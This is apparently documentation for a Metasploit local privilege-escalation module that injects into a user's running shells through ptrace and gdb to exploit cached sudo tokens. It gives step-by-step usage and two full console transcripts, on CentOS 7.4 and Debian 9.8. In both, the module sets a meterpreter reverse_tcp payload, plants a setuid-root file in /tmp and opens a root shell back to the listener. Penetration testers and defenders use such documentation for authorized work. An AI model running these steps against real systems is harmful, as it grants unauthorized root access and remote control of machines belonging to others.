## Description

  This module attempts to gain root privileges by blindly injecting into
  the session user's running shell processes and executing commands by
  calling `system()`, in the hope that the process has valid cached sudo
  tokens with root privileges.

  The system must have gdb installed and permit ptrace.


## Vulnerable Application

  This module has been tested successfully on:

  * Debian 9.8 (x64)
  * CentOS 7.4.1708 (x64)


## Verification Steps

  1. Start `msfconsole`
  2. Get a session
  3. `use exploit/linux/local/ptrace_sudo_token_priv_esc`
  4. `set SESSION <SESSION>`
  5. `check`
  6. `run`
  7. You should get a new *root* session


## Options

  **SESSION**

  Which session to use, which can be viewed with `sessions`

  **TIMEOUT**

  Process injection timeout (seconds) (default: `30`)

  **WritableDir**

  A writable directory file system path. (default: `/tmp`)


## Scenarios

### CentOS 7.4.1708 (x64)
  
  ```
  msf5 > use exploit/linux/local/ptrace_sudo_token_priv_esc 
  msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set session 1
  session => 1
  msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp 
  payload => linux/x64/meterpreter/reverse_tcp
  msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set lhost 172.16.191.165
  lhost => 172.16.191.165
  msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set verbose true
  verbose => true
  msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > run

  [*] Started reverse TCP handler on 172.16.191.165:4444 
  [+] YAMA ptrace scope is not restrictive
  [+] SELinux deny_ptrace is disabled
  [+] sudo is installed
  [+] gdb is installed
  [*] Searching for shell processes ...
  [*] Found 3 running shell processes
  [*] 2343, 2483, 2958
  [*] Writing '/tmp/.ka44kFCm8XyMEZ' (329 bytes) ...
  [*] Injecting into process 2343 ...
  [*] Injecting into process 2483 ...
  [*] Injecting into process 2958 ...
  [+] /tmp/.ka44kFCm8XyMEZ setuid root successfully
  [*] Executing payload...
  [*] Transmitting intermediate stager...(126 bytes)
  [*] Sending stage (3021284 bytes) to 172.16.191.141

  [*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.141:53462) at 2019-08-10 02:49:48 -0400
  [-] Failed to delete /tmp/.ka44kFCm8XyMEZ: stdapi_fs_delete_file: Operation failed: 1

  meterpreter > getuid
  Server username: uid=0, gid=0, euid=0, egid=0
  meterpreter > sysinfo
  Computer     : centos-7-1708.localdomain
  OS           : CentOS 7.4.1708 (Linux 3.10.0-693.el7.x86_64)
  Architecture : x64
  BuildTuple   : x86_64-linux-musl
  Meterpreter  : x64/linux
  meterpreter > 
  ```

### Debian 9.8 (x64)

  ```
  msf5 > use exploit/linux/local/ptrace_sudo_token_priv_esc 
  msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set session 1
  session => 1
  msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp 
  payload => linux/x64/meterpreter/reverse_tcp
  msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set lhost 172.16.191.165
  lhost => 172.16.191.165
  msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set verbose true
  verbose => true
  msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > run

  [*] Started reverse TCP handler on 172.16.191.165:4444 
  [+] YAMA ptrace scope is not restrictive
  [+] sudo is installed
  [+] gdb is installed
  [*] Searching for shell processes ...
  [*] Found 5 running shell processes
  [*] 661, 891, 23499, 23518, 23541
  [*] Writing '/tmp/.Dpq90j6vOk' (329 bytes) ...
  [*] Injecting into process 661 ...
  [*] Injecting into process 891 ...
  [*] Injecting into process 23499 ...
  [*] Injecting into process 23518 ...
  [+] /tmp/.Dpq90j6vOk setuid root successfully
  [*] Executing payload...
  [*] Transmitting intermediate stager...(126 bytes)
  [*] Sending stage (3021284 bytes) to 172.16.191.232

  [*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.232:50744) at 2019-08-10 02:54:34 -0400
  [-] Failed to delete /tmp/.Dpq90j6vOk: stdapi_fs_delete_file: Operation failed: 1

  meterpreter > getuid
  Server username: uid=0, gid=0, euid=0, egid=0
  meterpreter > sysinfo
  Computer     : debian-9-8-x64.local
  OS           : Debian 9.8 (Linux 4.9.0-8-amd64)
  Architecture : x64
  BuildTuple   : x86_64-linux-musl
  Meterpreter  : x64/linux
  meterpreter > 
  ```

